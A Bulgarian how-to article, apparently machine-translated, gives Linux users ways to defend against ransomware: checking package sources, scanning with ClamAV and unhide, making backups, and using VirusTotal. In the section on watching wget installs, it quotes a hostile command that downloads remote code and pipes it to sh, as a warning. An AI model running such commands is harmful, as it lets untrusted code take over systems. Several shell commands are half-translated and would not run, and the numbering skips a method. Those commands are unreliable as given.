Ransomware е един от най-заплашителните проблеми в света на мрежовата сигурност днес. Страшно е да мислите, че някой може да държи данните ви като заложници. Някои инфекции с рансъмуер криптират всички данни за определен обем и лицата зад тях изискват определена сума пари, преди да се съгласят да пуснат ключа, необходим за отключване на споменатите данни. Това е особено загрижено за хора, които са инвестирали много пари в своите данни. Има обаче малка добра новина за потребителите на Linux.
В повечето ситуации е трудно за рансъмуерния код да получи контрол над нещо повече от домашната директория на потребителя. Тези програми нямат разрешенията да изхвърлят цялото инсталиране в кошчето. Ето защо Linux ransomware е по-голям проблем на сървърите, където операторите винаги имат root достъп. Рансъмуерът не би трябвало да е проблем за потребителите на Linux и има няколко стъпки, за да предотвратите това да ви се случи.
Метод 1: Защита срещу атаки в стил BashCrypt
BasyCrypt е доказателство за концепция на рансъмуер, който доказа, че е възможно да се заразят сървърните структури с този тип злонамерен код. Това осигурява изходна линия за това как могат да изглеждат пакетите за рансъмуер на Linux. Въпреки че в момента те са необичайни, същите видове здрави превантивни мерки за сървърните администратори на други платформи работят също толкова добре тук. Проблемът е, че в среди на ниво предприятие може да има голям брой различни хора, които използват хост система.
Ако използвате пощенски сървър, може да бъде ужасно трудно да попречите на хората да правят глупости. Постарайте се да напомните на всички да не отварят прикачени файлове, за които не са сигурни, и винаги злонамерен софтуер сканира всичко, за което става въпрос. Друго нещо, което наистина може да помогне за предотвратяване на този вид атаки, идва от наблюдението как инсталирате двоични файлове с wget. Естествено на вашия пощенски сървър вероятно липсва изобщо работна среда и вероятно използвате wget, apt-get, yum или pacman за управление на идващите пакети. Много е важно да наблюдавате какви хранилища се използват в тези инсталации. Понякога ще видите или команда, която иска да изпълните нещо като wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, или може да е вътре в скрипта на черупката. И по двата начина, не го стартирайте, ако не знаете за какво е предназначено това хранилище.
Метод 2: Инсталиране на скенер пакет
Съществуват няколко парчета технология за сканиране на злонамерен софтуер с отворен код. ClamAV е най-известният и можете да го инсталирате на много базирани на apt дистрибуции, като използвате:
sudo apt-get инсталирате clamav
Когато е инсталиран, man clamav трябва да обясни употребата на обикновен език. Имайте предвид, че макар да може да сканира и премахва заразени файлове, всъщност не може да премахне заразен код от файл. Това е ситуация на всичко или нищо.
Има втори скенер, с който може да не сте запознати, но е полезно, ако скритите процеси са това, което ви плаши. Отново, ако използвате базирана на apt дистрибуция, тогава издайте тази команда, за да инсталирате демонстрационния скенер:
sudo apt-get инсталирайте unhide
Когато е инсталиран, напишете:
sudo unhide sys
Това ще направи пълно сканиране на вашата система за скрити процеси.
Метод 4: Поддържане на чисти архиви на ръка
Макар че това дори не би трябвало да е проблем, тъй като всеки винаги трябва да прави резервни копия, наличието на добри архиви може незабавно да извлече рансъмуера. Това, което има много малко рансъмуер на платформата Linux, обикновено атакува файлове с разширения, които са специфични за платформите за уеб разработка. Това означава, че ако имате тон .php, .xml или .js код, който седи наоколо, ще искате конкретно да архивирате това. Помислете за следния ред код:
tar -cf backups.tar $ (намери -име “* .ruby” -или -име “* .html”)
Това трябва да създаде голям архивен файл на лента за всеки файл с разширения .ruby и .html в рамките на файлова структура. След това може да бъде преместен в различен временен поддиректория за извличане, за да се гарантира, че създаването му е работило правилно.
Този архив на лента може и трябва да бъде преместен във външен том. Можете, разбира се, да използвате .bz2, .gz или .xv компресия, преди да го направите. Може да пожелаете да създадете огледални архиви, като ги копирате в два различни тома.
Метод 5: Използване на уеб-базирани скенери
Може би сте изтеглили RPM или DEB пакет от сайт, който обещава да съдържа полезен софтуер. Софтуерът също се разпространява чрез 7z или компресирани tar файлове. Потребителите на мобилни устройства също могат да получат пакети за Android във формат APK. Лесно е да ги сканирате с инструмент направо във вашия браузър. Насочете го към https://www.virustotal.com/ и след като страницата се зареди, натиснете бутона „Избор на файл“. Преди да качите, имайте предвид, че това е публичен сървър. Въпреки че е безопасен и се управлява от Alphabet Inc, той прехвърля файлове публично, което може да е проблем в някои супер сигурни среди. Също така е ограничен до 128 MB файлове.
Изберете файла си в появилото се поле и изберете отворено. Името на файла ще се появи в реда до бутона след изчезването на полето.
Кликнете върху голямото синьо „Сканирай!“ бутон. Ще видите друго поле, което показва, че системата качва вашия файл.
Ако някой вече е проверил файла предварително, той ще ви уведоми за предишния отчет. Той разпознава това въз основа на сума SHA256, която работи по същия начин като същите инструменти на командния ред на Linux, с които сте свикнали. Ако не, тогава ще стартира пълно сканиране с 53 различни програми за сканиране. Някои от тях може да изтекат, когато файлът се изпълни, и тези резултати могат безопасно да бъдат игнорирани.
Някои програми могат да върнат различни резултати от други, така че е лесно да се премахнат фалшивите положителни резултати с тази система. Най-хубавото е, че работи между различни платформи, което го прави еднакво привлекателен, независимо от разпространението, което имате на различни устройства. Той работи също толкова добре и от мобилни дистрибуции като Android, поради което отново е чудесен начин да проверите APK пакетите, преди да ги използвате.
4 минути четене
